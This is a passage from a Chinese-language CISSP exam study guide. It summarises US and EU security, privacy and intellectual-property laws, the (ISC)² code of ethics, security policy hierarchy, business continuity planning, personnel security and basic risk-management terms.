rule)。就是要谨慎工作,这种规则要求高管确保他能 常态化的、持续的保持适度关注(due care)的态度;其它人员同样也要求保持谨慎工作的态 度。这个规则以前用在在财政领域。(就是领导责任制) ②提出从轻处罚规则。对于有违法行为的组织机构和执行官,如果它能证明其保持并运用 了适度关注的原则,并履行了自己的信息安全责任,那么可以从轻处罚。 ③明确了要证明疏忽或差错确实成立的三个要素。即:被控人员必须具有法律上认可的责 任;被控人员必须未遵守公认的标准;疏忽行为和后续损害之间必须存在因果关系。 ④高管渎职可以处以最高 2 亿美元的罚款。 6.文书精简法案(1995 年)(Paperwork Reduction Act of 1995) 文书精简法案(199 年)要求组织机构必须获得美国行政管理和预算局 OMB(Office of Management and Budget) 的批准后,才能请求使用各类基础公共信息。2000 年的政府信息安 —23— 全改革法案 GISRA(The Government Information Security Reform Act)对它进行了修正。 7.政府信息安全改革法案(2000 年) GISRA (Government Information Security Reform Act of 2000) 国会要求 GISRA-2000 的拟制满足以下五个基本目标: ①要提供 1 个内容全面的体制。确保所有政府相关的信息资源安全、有效。 ②要确保网络协同安全、有效。一切系统都是基于网络的,所以必须安全。 ③要有效监控和掌握所有与安全风险相关的活动和信息。每个人的每个行为都要被监控。 ④开发和维护联邦政府的信息安全防护系统。既要满足安全需求,也要实现最小成本。 ⑤提供改进机制。能持续优化、完善联邦机构的信息安全监督体系。 GISRA 仍然明确,NIST 负责非机密系统,NSA 负责机密系统,并实行领导负责制。 GISRA 重新定义了计算机系统的分类,明确了关键系统要满足以下条件: ①被法律条款定义为国家安全系统。 ②有机密信息且被相应的措施保护。 ③系统被攻击会对机构的业务产生不良影响。 在这之后,国会总算不再折腾了,没有通过任何新的关于计算机犯罪的重大事项。虽然提 了一些草案,都还没通过,如:2012 年的网络安全法案和 2013 年的网络情报共享和保护法案。 8.联邦信息安全管理法案 FISMA(Federal Information Security Management Act) 在 2002 年通过的联邦信息安全管理法案(FISMA),要求联邦政府实施一个信息安全项目, 涵盖了政府部门的运营和外包商的活动。NIST 开发了 FISMA 的实施指南,提出了确保信息安 全项目有效的关键要素:定期评估风险、安全意识培训、定期渗透测试、记录突发情况、制定 应急响应流程等。 D.2 许可与知识产权(例如:版权、商标、数字版权管理) 世界知识产权组织(World Intellectual Property Organization,WIPO )简明地定义了知 识产权。将知识产权分为两类: ①版权:涵盖了文学和艺术作品。②工业产权:如发明(专利)、工业设计和商标。 1.版权主要保护 8 类作品: 文学作品、音乐作品、戏剧作品、哑剧和舞蹈作品、绘画图形和雕刻作品、电影和其它音 像作品、声音录音、建筑作品。 法律规定,只要创作者的作品产生出来,起就立即自动享有版权。如果能证明你就是作品 的创作者,那么你就会受到版权法的保护。不过,在官方机构正式注册作品,可以政府承认他 们在具体的日期收到了你的作品,并认可你的版权。越来越多的“盗版软件”(warez)站点出 现了,这个 Warez 就是指非法传播盗版。 版权法不像商业秘密法那样保护特定的资源,它保护的是有资源意义的表达而不是资源本 身。它保护表达方式,而不是其本身。 专利更多地针对发明本身,而版权则涉及如何再生产和分发。从这个角度看,对版权的保 护弱于对专利的保护,但是版权保护的时间更长。版权的保护期是在受保护者的寿命基础上再 加上 70 年。(死后再保护 70 年) —24— 2.数字千禧年版权法案(DMCA)(Digital Millennium Copyright Act) DMCA 中有 2 个条款(打击盗版): ①阻止用户破坏版权保护机制。非法的复制会被处以巨额罚款。 ②网络服务商(ISP)的线路被用于传播盗版,也要承担相应的责任。 3.商标(Trademarks) 商标是单词、口号和标志语,用于标识某家公司及其产品或服务。保护商标的主要目的是 在保护个人和组织机构知识产权的时候避免市场的混乱。与版权的保护一样,为了获得法律的 保护,商标不需要正式注册,可以使用 ™ 符号来表示出你想要保护作为商标的单词或口号。 如果想让别人正式承认商标,那么可以在美国专利和商标局(US-PTO) 进行注册。注册的商标 用 ® 符号表示。 在美国,商标准许的初始期是 10 年,可以再连续不受限制地使用 10 年(共 20 年)。 4.专利(Patents) 专利是最强的知识产权保护形式,保护发明者的知识产权,是授予个人或公司的法律所有 权,使他们能够拒绝其他人使用或复制专利所指的发明。专利保护期一般是 20 年。 专利要满足以下要求: ①该发明必须是新的。(新) ①该发明必须是有用的。(有用) ③该发明不能是显而易见的。(难) 5.商业秘密(Trade Secrets) 商业秘密是公司特有的资产,对其生存和盈利有很大作用。版权和专利存在要公开细节, 保护时限等问题,所有公司必须自己可是你办法保护商业秘密。很多公司都要求其员工签订一 个保密协议 NDA(Non Disclosure Agreement)。 6.经济间谍法案(1996 年)(Economic Espionage Act of 1996) 经济间谍法案(1996 年)主要有 2 个规定: ①任何被发现为外国政府或机构而从美国公司窃取商业秘密的人,可以被处以高达 50 万 美元的罚款和长达 15 年的监禁。 ②任何被发现其它情况中窃取商业秘密的人,可以处以 25 万美元的罚款和 10 年的监禁。 7.许可证(Licensing) 要熟悉软件的许可证颁发协议。许可证有四种类型: ①签书面合同。②写在软件包装外面。③单击许可证协议来完善软件安装。④云服务许可 协议,在屏幕上弹出一个确认己阅读并同意条款的确认框。 8.统一计算机信息处理法案 UCITA(Uniform Computer Information Transactions Act) 统一计算机信息处理法案(UCITA),提供了计算机相关业务处理的共同架构,包括对软件 许可证颁发的规定。UCITA 为上述的②、③形式的许可提供了法律描述和保护。还要求用户可 以在安装之前拒绝许可证协议,生产商必须全额退款。它要求不同州之间的“许可协议”都符 合统一的标准。 D.3 进口/出口控制 —25— 美国有两部法律与此相关: ①国际武器贸易条例法案(International Traffic in Arms Regulations Act,ITAR:1976) ②出口管理条例法案(Export Administration Regulations Act,EAR:1979)。 CISSP 考试要求对出口控制问题有大致的了解,是否有强加在科技和技术信息之上的限制 和控制。 D.4 跨境数据流 瓦森纳协议(Wassenaar Arrangement) WA 是对“常规武器和两用货品及技术”实施进出口管制的法律,来用阻止恐怖国家的军 事实力增强,由 40 个国家共同制定了 9 类端口的出口规范,包括特殊材料、高科技设备、保 密机等产品。 D.5 隐私 个人可识别信息 PII(Personally identifiable information)是用来唯一识别、联系 或者定位一个人的数据,往往被用于身份盗窃、金融犯罪和各种犯罪活动中。 1.美国有关隐私的法律 好多,眼花缭乱。必考的,要背下来。 ①第四修正案(Fourth Amendment of the Constitution) 隐私权的基础是美国宪法的第四修正案,内容如下:法律保护个人的人身、房屋、证件和 财物不受无理的搜查和没收。搜查检索必须要有许可。 ②隐私法案(1974 年)(Federal Privacy Act of 1974) 美国的隐私法案(1974年)是对美国联邦政府有关公民个人私有信息处理的最重要的法律。 任何机构在没有得到当事人书面同意的情况下,不得向他人泄漏隐私信息。 ③电子通信隐私法案(1986 年)ECPA(Electronic Communications Privacy Act of 1986) 电子通信隐私法案(ECPA)规定对个人电子隐私的侵犯是犯罪行为。最重要的规定禁止窃 听,不能偷电邮,否则处以最高达 500 美元的罚款和最高 5 年的监禁。(其实美国在窃听全世 界) ④执法通信协助法案(1994 年)CALEA(Communications Assistance for Law Enforcement Act) 执法通信协助法案(CALEA)是对上面那个 1986 年的电子通信隐私法案的修正。它要求通信 运营商允许持有法院命令的执法人员进行合法窃听。 ⑤经济和专有信息保护法案(1996 年)EPPA(Economic and Protection of Proprietary information Act of 1996) 该法案将经济信息也视为财产,盗窃并不局限于物理产品。 ⑥健康保险的易移植性和可问责性法案(1996 年)HIPAA(Health Insurance Portability and Accountability Act of 1996) HIPPA 经常被考到,它要求医院、医师、保险公司和其它处理或存储个人医疗隐私信息的 组织采取严格的安全措施,明确定义了个人在医疗记录方面的权利。 —26— ⑦2009 关于经济和临床健康的卫生信息技术法案 HITECH(Health Information Technology for Economic and Clinical Health Act of 2009) 关于经济和临床健康的卫生信息技术法案(HITECH)对 HIPAA 进行了修订。主要变化是针对 商业伙伴(BAs)的。它将所有相关机构定义为:处理被保护的健康信息(PHI)的组织机构。任 何 PHI 机构和一个商业伙伴(BA)之间的关系必须有书面合同管理,这个合同被称为业务联合 协议(business associate agreement,BAA)。 HITECH 还明确了数据泄露的通告范围:发生泄密事件的 PHI 机构必须通知受影响的个人, 影响超过 500 人时,必须通知卫生和人事服务部(the Secretary of Health and Human Services)的部长和媒体。 HITECH 是全国性的法律。此外,每个州都颁布了自己的相关法规。加利福尼亚州的 SB1386 是第一个发布的,涉及以下隐私信息:社会保险号、驾照号码、身份证号码、信用卡或借记卡 号码、银行账户与安全代码、病历、医疗保险信息等。 ⑧数据泄露通知法 DBNL(Data Breach Notification Laws) 若有泄密事件,当事单位必须在 60 天以内通知个人信息被非法访问。(如果影响超过 500 个人,还必须向媒体发布相关事件)。 ⑨儿童联机隐私保护法案(1998 年)COPPA(Children’s Online Privacy Protection Act of 1998) 儿童联机隐私保护法案(COPPA)对儿童网站的信息保护提出了一系列要求。它要求任务 组织必须要取得父母的同意后,才能收集 13 岁以下儿童的信息。 ⑩Gramm-leach-Bliley 法案(1999 年) GLBA/金融服务现代化法案/格蕾姆 GLBA-1999,严格限制了银行、保险公司等商业机构之间的信息共享和服务提供。 ⑾美国爱国者法案(2001 年)(USA PATRIOT Act of 2001) 这个是国会对 2001 年 911 事件的响应。它扩大情报机构的权限,将以前一次只能获取一 条线路的监听授权扩大为可以获得对一个人的有所通信进行监听的一揽子授权。另一方面,允 许网络服务提供商(ISPs)提供更多的信息。它 OpenID 还修正了计算机欺诈和滥用法案(CFAA), 对犯罪行为从重处理。 ⑿子女教育权利和隐私法案 FERPA(Family Educational Rights and Privacy Act) FERPA 是关于教育机构的,保护成年学生和未成年学生父母的隐私权。 ⒀身份偷窃和冒用阻止法案(1998 年)(Identity Theft and Assumption Deterrence Act) 就是规定身份偷窃是严重的犯罪行为。 ⒁萨班斯-奥克斯利法案(SOX-2002) Sarbanes-Oxley ACT 2002 年的该法案(简称为 SOX)适用于在美国上市的任何公司,其中的许多法律被用于监管 会计行为以及公司上报财务状况所使用的方法。然而,某些部分(特别是 404 条款)直接适用于 信息技术。SOX 对公司如何追踪、管理和报告财务信息提出了专门要求,这包括保护财务数据 并保证它的完整性与真实性。大多数公司都依赖计算机设备和电子存储来进行事务处理和数据 归档,因此公司必须采用适当的流程和控制来保护这些数据。公司管理人员,包括首席执行官 (CEO)、首席财务官(CFO)和其他人员,如果不遵守 Sarbanes-Oxley 法案,那么可能导致严厉 的处罚,甚至可能会入狱数年。 —27— 2.欧盟有关隐私的法律 ①概括指令(directive outlining privacy measures) 1995 年,欧盟(EU)议会也通过了描述隐私措施的概括指令(directive outlining privacy measures)。要求所有个人数据的处理要满足有关标准,明确了个人对自己信息的处理权利。 ②美国—欧盟安全港湾项目/安全避难所(避风港 Safe Harbor program) 经过与联邦数据保护和信息、委员会的商讨,美国商务部开发了独立的安全港湾框架来调 和欧美对于隐私不同的处理方式,并给美国组织提供一种优化的方法以符合欧盟数据保护法的 要求:数据出口方和进口方之间的合同必须需要事先获得国家数据保护当局的批准,方可传输 数据到国外。为了符合安全避难所规定,在欧洲进行商业活动的美国公司必须满足 7 项处理个 人信息的要求。这里强调下经常考的 7 个安全港原则。这是美国贸易部的一个控制机制,防止 未授权的信息泄露,相关的术语有: 1)通知 notice:任何组织必须告知个人使用数据的目的。(告知我) 2)选择 Choice:任何组织必须为个人提供可选择的机会。(我选择) 3)向前传输 Onward transfer:组织只有在遵守通知及选择规则的基础上才能向其他组织 传输资料。(别乱传) 4)安全 Security:组织必须保护好数据。(别泄密) 5)数据完整 Data integrity:组织不得将信息挪用,还要确保数据真实可信。(别乱改) 6)访问 Access:个人可以查、改或删组织所持有的他们的个人信息。(属于我) 7)执行 Enforcement:组织必须落实以上各条原则。(别搞事) 安全港湾项目的目的是有效衔接美国与欧盟不同的隐私法律与标准,主要针对的是欧盟的 The EU Data Protection Directive(欧联数据保护纲领),它就包括了上面的 7 个原则,不 过它也将在 2018 年被 GDPR (European Union’s General Data Protection Regulation)取 代。 3.支付卡行业数据安全标准(Payment Card Industry Data Security Standard) 支付卡行业数据安全标准(PCI-DSS) 是一个非法律但有合同义务的优秀合规要求典范。有 12 个主要要求,不列举了。它提供了一系列关于支付安全控制的标准。 D.6 数据泄露/数据破坏 了解下法规,基本上就是出现泄密事件必须 24 小时内上报。 1.电子通信服务规范(Regulation for Electronic Communication Service,EU:2013) 欧洲电子通信服务提供者,需要在检测到个人数据泄露后不迟于 24 小时向国家主管当局 提供个人数据泄露的数据泄露通知。 2.隐私和电子通信法规(Privacy and Electronic Communications Regulations.UK: 2013) 电子通信服务提供商,诸如电信,互联网服务供应商(ISPs),在知道数据泄露的基本事实 后必须在 24 小时内通知 UK 信息专员办公室。 —28— E.理解职业道德 E.1 践行(ISC)² 职业道德规范 Code of Ethics 在你参加考试和成为 CISSP 之前会被要求签署(ISC)2道德规范。你需要理解道德规范并把 它应用到现实当中,诸如组织内的用户群体的道德贵任。 1.(ISC)2 道德规范序文 Code of Ethics Preamble The safety and welfare of society and the common good, duty to our principles, and to each other, requires that we adhere, and be seen to adhere, to the highest ethical standards of behavior. Therefore, strict adherence to this Code is a condition of certification. “我们坚守国家安全,对雇主负责,始终遵守最高的道德行为标准和相关要求。” “因此,严格遵守这些准则是通过认证考试的必然条件。” 2.(ISC)2 道德规范准则 4 条/Code of Ethics Canons: *Protect society, the common good, necessary public trust and confidence, and the infrastructure. *Act honorably, honestly, justly, responsibly, and legally. *Provide diligent and competent service to principles. *Advance and protect the profession. ①保护社会,国家和基础设施。 ②行为诚实、正直、公正、负责和合法。 ③为雇主尽职尽责服务。 ④提升能力和促进行业发展。 顺序很重要,①是最重要的准则。 3.尊重考试 A CISSP candidate and a CISSP holder should never discuss with others what was on the exam. This degrades the usefulness of the exam to be used as a tool to test someone’s true security knowledge. If this type of activity is uncovered, the person could be stripped of their CISSP certification because this would violate the terms of the NDA upon which the candidate enters prior to taking the test. Violating an NDA is a violation of the ethics canon that requires CISSPs to act honorably, honestly, justly, responsibly and legally. 已经通过 CISSP 考试的人不得与其它任何人谈论、议论或讲授关于考试内容的信息,针对 应试而进行的真题收集等活动,将严重影响考试对考生真实能力素质的评估效果,从而大幅降 低这项测试信息安全从业人员真实知识水平的,客观、准确、公平的认证考试的含金量和可靠 度。有此类违规行为的 CISSP 人员,既违反了考试的保密协议,也违反了 CISSP 的职业道德, 将吊销其证书。请不要尝试收集真题,保持其应有的考试难度,控制通过比例。 E.2 支持组织的道德准则 —29— 1.四类道德标准 ①全球责任;②国家;③组织;④个人。 2.计算机道德协会(Computer Ethics Institute) 是一个非盈利组织,它以道德的方式帮助推进技术发展。制定了它自己的计算机道德 10 诫(Ten Commandments of Computer Ethics): (1)不得使用计算机伤害其他人。 (2)不得干预其他人的计算机工作。 (3)不得窥探其他人的计算机文件。 (4)不得使用计算机进行盗窃。 (5)不得使用计算机提交伪证。 (6)不得复制或使用尚未付款的专利软件。 (7)在未获授权或未提交适当赔偿的前提下,不得使用其他人的计算机资源。 (8)不得盗用其他人的知识成果。 (9)应该考虑你所编写的程序或正在设计的系统的社会后果。 (10)在使用计算机时,应考虑尊重人类。 3.互联网架构研究委员会(Internet Architecture Board, IAB) IAB 是用于 Internet 设计、工程和管理的协调委员会。它负责对 Internet 工程任务组 (Internet Engineering Task Force, IETF)的活动、Internet 标准流程(Internet Standards Process)的监督和上诉、注释请求(Request for Comment, RFC)的编辑进行架构监督。否则, Internet 将无法正常使用。 F.制定并实施文档化的安全策略、标准、程序和方针 以下描述的内容都是规范化的安全策略结构中的几大要素,搞清楚是什么: 1.安全策略(Security Policies) 规范化的最高层次被称为安全策略。安全策略是一个文档,包括:组织的安全需求、安全 目标、安全原则、安全架构,定义所有相关的术语,定义角色、分配职责,指定审计要求等等。 安全策略是强制性的,包括特定问题的安全策略、特定系统的安全策略和综合的安全策略 类,综合的安全策略有 3 种类型,包括:规章式的、建议式的和信息式的。 ①规章式的策略(regulatory policy),主要涉及必须遵守的行业标准或法律规定; ②建议式的策略(advisory policy),解释了高层管理对内部安全和合性性的期望,包括 可接受的行为和活动,并定义违背安全性的后果。大多数安全策略都是建议性的。 ③信息式的策略(lnformative policy),提供了与相关的支持、研究或背景信息,用于 提供特定的信息或知识,例如公司目标、任务声明或者组织如何与合作伙伴和客户进行交流。 根据内容策略分为 3 种类型: ①组织性策略(Organizational or program policy):此类策略由高级管理层发布,该 策略描述并委派信息安全责任,定义实现 CIA 的目标,强调需要特别关注的信息安全问题(例 如保护信用卡公司或健康保险公司的机密信息,或者高可用性系统)。通常情况下,此类策略 的范围是整个组织。 —30— ②功能型策略/特定问题策略(issue-specific policy):针对特定安全领域或关注点, 例如访问控制、持续性计划、职责分离等,或者针对特定的技术领域,例如使用互联网、电子 邮件、无线访问、远程访问等。此类策略依赖于业务需要和可接受的风险水平。内容包括:对 特定问题的阐述,组织针对该问题的态度,适用范围,符合性要求,惩戒措施等。 ③特定系统策略(System-specific policy):针对特定的技术或操作领域制定的更细节 化的策略,比如特定应用或平台。 2.策略链 策略是层次性的,下面是至上到下的策略链: 方针(最高策略)=>标准(技术方法)=>基线(最低标准)=>指南(运用标准)=>程序(操作实现) 它们的关系:安全策略是有组织的安全文档的总体结构的基础;然后,标准基于策略并受 规章制度的管辖;指南从其中衍生而来;最后,程序基于前面三个基本要素。 ①策略/方针 Policy:处于策略链的最高层次,它是由组织的高级管理层发布的、关于信 息安全最一般性的声明。方针应该代表着高级管理层对信息安全承担责任的一种承诺,一旦发 布,要求组织成员必须遵守。策略/方针的实施要依靠标准、指南和程序。 ②标准 Standard:标准规定了在组织范围内强制执行的对特定技术和方法的使用。标准 起着驱动方针的作用,标准可以用来建立方针执行的强制机制。 ③基线 Baseline:基线建立的是满足方针要求的最低级别的安全需要。在建立信息安全 整体框架之前,基线是需要考虑的最低标准。标准的开发通常都是以基线为基础的,基线可以 看作是抽象的简单化的标准。大多数基线都是很具体的,或者与系统相关,或陈述某种配置。 基准往往指的是行业或政府标准,例如可信任计算机系统评估标准(TCSEC)或信息技术安全评 估和标准(ITSEC)或者 NIST(美国国家标准技术研究院)标准。 ④指南 Guideline:类似于标准,也是关于加强系统安全的方法,但它是建议性的。指南 比标准更灵活,考虑到了不同信息系统的特点。指南也可用来规定标准的的开发方式,或者保 证对一般性安全原则的遵守。作为安全专家和用户的操作指南,提供了如何实现标准和基准的 建议。指南说明了应当部署哪些安全机制,概述了一套方法(包括行动建议),但并非强制性的。 彩虹系列、通用准则 CC、BS7799 等,都可以看作是此类。 ⑤安全程序/过程/措施/实施 Procedure:是执行特定任务的详细步骤。位于策略链的最 低层次,是实现方针、标准和指南的详细步骤。安全程序是详细的、按部就班的指导文档,它 描述了实现特定安全机制、控制或解决方案所需的确切行动。 G.理解业务连续性要求 本章必考 1.业务连续性计划(BCP)和灾难恢复计划(DRP)之间的差异。 ①BCP 是预防性的、全面、持续的,必须被首先应用(实施),并持续的应用。 ②DRP 是补救性的、应急、临时的,当 BCP 失败了(leaves off),就会启动 DRP(picks up)。 灾难恢复 DRP 的目的是,尽量减少灾难或中断所带来的影响,尽可能快的恢复正常的业务 活动。DRP 只在灾难发生后才实施。灾难恢复处理“我的天哪,天要塌了”,而连续性规划处 理“好了,天塌下来了。现在,我们该如何继续经营? —31— 虽然文字上都写的是“计划-PLAN”,但实际上它不只是一系列的文档方案,还包括了相 关的应对工作、实施过程和实践操作。 考试中的灾难恢复 DR,是指对技术环境的恢复,是以信息技术为核心的,也就是信息系 统的恢复,而不是对整个组织管理、业务运行、物理环境、生产能力的恢复。 业务连续性管理(BCM),是整体的管理过程,包含 DRP 和 BCP,提供一个框架,实施管 理,形成能力。BCM 的主要目的是允许该组织继续在不同条件下进行业务操作。 2.业务连续性计划(BCP)的步骤 ISC2定义的创建业务连续性计划的过程包括以下四个主要步骤: ①编制计划;②评估业务影响;③连续性计划;④批准和实现。 在第七域的 N 章节,详述了 NIST 800-34 规范的业务连续性管理的流程,和上面的不一样。 考题里问 BCP 的第一个步骤,一般选业务影响分析 BIA(包括分析关键业务、调研各个部 门),而不是计划。 G.1 制定并记录项目范围和计划 业务连续性计划 BCP 的步骤流程就是下面的 1、2、3、4 步,其中的“企业组织架构分析” 要做 2 次!BCP 第一步:先一个人来做企业组织架构分析;然后他牵头组建 BCP 团队;接着 BCP 团队再做一次企业组织架构分析,来修订和验证之前他做的分析;之后才获取资源干正事了。 1.先分析企业组织架构(业务组织分析)Business organization analysis 分析组织架构是重要的基础工作,为确定 BCP 团队成员提供了根据,通常由 BCP 先头部队 来完成。需要考虑的关键部门有:核心业务运营部门、支撑保障部门(IT、维修等)、高管人 员等。 2.再选择 BCP 团队 BCP team selection 团队要包括各种各样的关键人物,团队领导一定要是企业的高管之一,才好有效落实。 2.5 再做一次全面的企业组织架构分析。 3.再获得相关资源 resource consumed 不同阶段要有不同的资源来支撑保障 BCP 有效实施。 ①BCP 开发:前面提到的四个步骤(项目范围和计划编制、业务影响评估、连续性计划、 批准和实现),最需要的资源就是人力,也就是抽组人员、集中办公、拟制计划。 ②BCP 测试、培训和维护:这时候要有基础环境的保障,也就是软、硬件设施。当然,人 力总是不可缺少的。 ③BCP 实现:当灾难和意外发生时,更就需要大量的资源来执行 BCP,反正什么都要。 4.还要考虑法律、法规要求(合规)Legal and regulatory assessment 在业务连续性计划实施过程中,聘请法律顾问是非常重要的。 5.安全管理计划小组应该开发三类计划: ①战略计划(strategic plan)是长期计划(例如 5 年),相对稳定,定义了组织的目标 和使命。 ②战术计划(tactical plan)是中期计划(例如 1 年),是对实现战略计划中既定目标 的任务和进度的细节描述,例如维护计划、系统开发计划、变更管理、技术革新、容灾备份等。 —32— ③操作计划(operational plan)是短期的高度细化的计划,须经常更新(每月或每季度), 例如培训计划、系统部署计划、产品设计计划等。 G.2 开展业务影响分析 BCP 团队完成了准备创建业务连续性计划的四个阶段,就会进入工作的核心部分:业务影 响分析/评估(BIA)。BIA 先确定决定组织持续发展的资源,再分析资源的潜在威胁,再评估每 种威胁的可能性和对业务的影响。BIA 的定量分析、定性分析在第一域 I.2 章节里讲过了。(相 关内容在第六域 C.6 章节和第七域 N 章节里面也有涉及)。 BIA 的标准流程是 4 步: ①收集信息。Gathering information。识别和列举组织的所有业务。 ②评估脆弱性。Performing a vulnerability assessment。 ③分析业务影响。Analyzing the information。 ④拟制并呈报分析报告。Documenting the results and presenting the recommendations。 1.确定业务优先级 BIA 的第一个任务是确定业务优先级,就是当灾难发生时,哪个业务最重要,最先被恢复。 这里涉及几个常用概念: ①最大允许中断时间(MTD)Maximum Tolerable Degradation,也称为最大容忍中断时间 (MTO),指的是某个业务功能出现故障但是不会对业务产生无法弥补的损害所允许的最大时 间长度(底线)。 ②恢复时间目标(RTO)recovery time objective,就是当中断事件发生时,实际恢复功 能的时间期望。 BCP 过程的目标是确保你的 RTOs 小于 MTDs。 很明显,MTD 最短的业务,其优先级就越高! 2.识别风险 识别风险是一个纯粹的定性分析的过程,就是列出可能的各种风险。自然或人为的风险。 3.业务影响评估 这里要考虑到所谓的云服务的可靠性,当企业的某个服务外包给第三方公司时,它的中断 风险一定要考虑到。 4.可能性评估 就是要算出年发生比率(ARO)。 5.影响评估 这里要定义暴露因子 EF,计算单损 SLE,计算年损 ALE。当然,也可以用定性的方法,只 评级,不量化计算。 6.资源优先级划分 Resource prioritization BIA 的最后一个步骤,因是针对各种不同风险,确定分配业务连续性资源的优先级。如果 生成了一个所有风险的列表,那么年损最大的风险优先级就最高。 前面只是做了影响分析,下面要开始写 BCP 计划了 7.策略开发 strategy development —33— BCP 团队现在根据风险优先级列表,确定采取什么应对措施(减轻、转移、接受和拒绝)。 这是衔接业务影响分析 BIA 和业务连续计划拟制工作的环节!这个策略的主要内容包括:范围、 任务说明、原则、指南和标准。 8.预备和处理 Provisions and processes 有了 BCP 策略,就要研究怎么保护人、建筑物与设备、基础设施等,采取什么措施缓解 (mitigate)不可按受的风险。这里就要研究实际的风险消减机制、方法、手段了。 9.计划批准 一旦 BCP 团队完成了 BCP 文档的设计,那么就该呈上审批了。高层的决策是最关键的。 10.计划实现 计划被批准了,就要落实了,包括资源分配、计划维护什么的。 11.培训和教育 培训和教育是落实 BCP 计划的一项重要内容,确保人员在灾难发生时能够有效地完成其任 务,人员还要有所冗余。 12. BCP 文档化 成体系的,持续的修订、完善和保存 BCP 文档,确保该项工作有序开展。 现在算是完成业务连续性的计划的研究拟制和预备实施工作了,有些具体的执行和维护工 作在第七域的灾难恢复里讲。 H.促进人员安全策略 雇用新的职员涉及几个明确的步骤:①创建工作描述、②设置工作分类、③筛选候选人、 ④雇用和培训最适合这项工作的人。 1.员工管理方面的重要元素包括责任分离、工作职责和岗位轮换 ①职责分离(Separation of Duties) 职责分离属于安全概念,是指把关键的、重要的和敏感的工作任务分配给若干不同的管理 员或高级执行者,是将最小权限原则应用到管理员身上。这样做能避免一个人能够独自干成一 件坏事,也能防止共谋 collusion。共谋指的是几个人的团伙一起干成一件坏事。 ②工作职责(Job Responsibilities) 工作职责是要求员工在常规的基础上执行特定工作任务。这个概念主要用来确定员工的最 小访问权限。 ③岗位轮换(Job Rotation) 让员工在不同的工作岗位中轮换职位,从而提高整体的安全性。岗位轮换有两种功能:一 是提供知识和人员的冗余,缺谁都照样运转;二是提供了一种同级审计形式,减少伪造、篡改、 偷窃、破坏和信息滥用的风险,也能够防止共谋。 ④交叉训练(Cross-training) 是工作轮换的另一种形式,员工不换岗位,只是跟班学习或者临时顶替一下,是一种应急 预案。 上面的①、②、③都是经常考的。 —34— H.1 求职人员甄选 (例如:证明人核实、教育背景查证) 要确保任职人员的安全性,必须做背景调查和安全检查。 背景调查 背景调查包括:获得候选人的工作和教育历史记录,检查证明材料,与候选人的同事、邻 居和朋友进行面谈,向警察局和政府机关调查候选人的拘捕或违法活动记录,通过指纹、驾驶 执照和出生证明来认证身份,还要进行面试。如有必要,也可以采用测谎仪、药检、性格测试 /评估等形式。很多公司还要对申请人进行在线背景调查和社交网络账号复审。 重要的安全岗位对人的道德素养要求很高,所以别用自己的身份证去乱开房,还有手机号、 银行账户都会被查的。 H.2 雇佣协议与政策 新员工入职,要签署雇佣协议和保密协议。 1.雇佣协议 协议文档说明了组织的规则和限制、安全策略、可接受的使用和行为准则、详细的工作描 述、破坏活动及其后果、要求员工胜任工作所需的时间。 2.保密协议(NDA) NDA 用来保护组织的机密信息不会被的员工泄漏。 3.竞业禁止协议(NCA) NCA 通常与 NDA 同时存在。NCA(竞业禁止协议)防止了解公司核心秘密的员工进入另一 个存在竞争关系的组织机构,也能防止员工因为高薪而跳槽到另外的公司。通常,NCA 具有时 间限制,例如半年、一年甚至三年。 强制执行 NCA 是有一定困难的,法律上认可员工为了保障自己和家庭的生活,允许使用所 具备的技能和知识谋取工作,NCA 不能妨碍员工获得适当的收入。但是它的威慑作用和保密作 用还是明显的。 4.强制休假 强制员工休假,可以提供与岗位轮换类似的好处。代班的人员可以审计发现他的过失。 H.3 劳动合同解除流程 解雇 1 个员工时,应该: ①采取不公开的和尊重人的方式。 ②终止合同时应该至少有一位证人在场,证人最好是高层经理或保安人员。 ③一旦员工被告知离职,应该被立刻护送离开,并且不允许通过任何理由返回办公地点。 ④在员工被解雇离开之前,所有组织特有的身份证件、访问权限或员工安全标志以及门卡、 钥匙和出入证都应该被收回。还必须在通知员工被解雇的同时或之前,就禁止或删除此员工对 系统的访问权限。 解雇员工的最佳时间是员工轮班结束的时候。一方面,留给时间去寻找新的就业机会;另 一方面,换班时解雇更加自然,可以减少压力。解雇员工时,根据员工的心理状态,视情进行 一次离职面谈,目的是:根据之前签署的雇用协议和保密协议来审查其责任和约束条件。 —35— H.4 供应商、顾问与承包商的控制 在使用任何类型的第三方服务提供商时,服务级别协议(SLA)尤为重要。 H.5 合规 详见 C 章节。 H.6 隐私 隐私性的定义多种多样,大概意思就是: ①防止对个人重要信息的未授权访问。 ②防止未被同意或知晓情况下,检查、监控其行为。 个人身份信息(PII)personally identifiable information PII 是可以追溯到源头的人的任何数据项。如:一个电话号码、电子邮件地址、邮寄地址、 社会保障号、名字、信用卡账号、银行账号等;没有代表性的个人信息不是 PII,如:一个 MAC 地址、IP 地址、操作系统类型、最喜欢的度假地点、高中吉祥物的名字等等。 I.理解与应用风险管理的概念 理解风险管理的概念是 CISSP 考试的重点(必考)。 风险管理的主要目的是要将风险降低到一个可以接受的级别。达到风险管理主要目标的过 程被称为风险分析(risk analysis)。风险评估(Risk Assessment)是对信息资产及其价值、 面临的威胁、存在的弱点,以及三者综合作用而带来风险的大小或水平的评估。 信息风险管理 IRM (lnfonnation Risk Management)是识别并评估风险、将风险降低至可 接受级别、执行适当机制来维护这种级别的过程。 风险分析提供了一种成本/收益比(costl-benefit comparison),也就是用来保护公司免 受威胁的防护措施的费用与预料中的损失所需要付出的代价之间的比值。在大多数情况下,如 果损失的代价没有超过防护措施本身的费用,那么就不应该实行该防护措施。风险分析有下列 4 个主要目标: ①标识资产和它们对于组织机构的价值。 ②识别脆弱性和威胁。 ③量化潜在威胁的可能性及其对业务的影响。 ④在威胁的影响和对策的成本之间达到预算的平衡。 1.重要术语 我们常常使用术语“脆弱性”、“威胁”、“风险”和“暴露”来表示同样的事情,然而, 它们实际上有不同的含义,相互之间也有不同的关系。理解每一个术语的定义是非常重要的, 但更重要的是应当理解它们彼此之间的关系。 ①资产(Asset) 资产是指环境中应该加以保护的任何事物。如:计算机文件、网络服务、系统资源、进程、 程序、产品、IT 基础架构、数据库、硬件设备、家具、产品秘方/配方、人员、软件和设施等。。 ②资产估值(Asset Valuation)AV 就是资产具备的货币价值。包括开发、维护、管理、宣传、支持、维修和替换资产的所有 —36— 成本,还包括公众信心、行业支持、生产率增加、知识资产以及所有者权益等无形价值。 ③弱点/脆弱性(Vulnerability) 一个资产的弱点(缺少安全措施)、缺陷(安全方面的问题)或者漏洞被称为脆弱性。一 旦被利用,就会对资产造成损害。如果没被利用,当然也就没事了。 ③威胁(Threats) 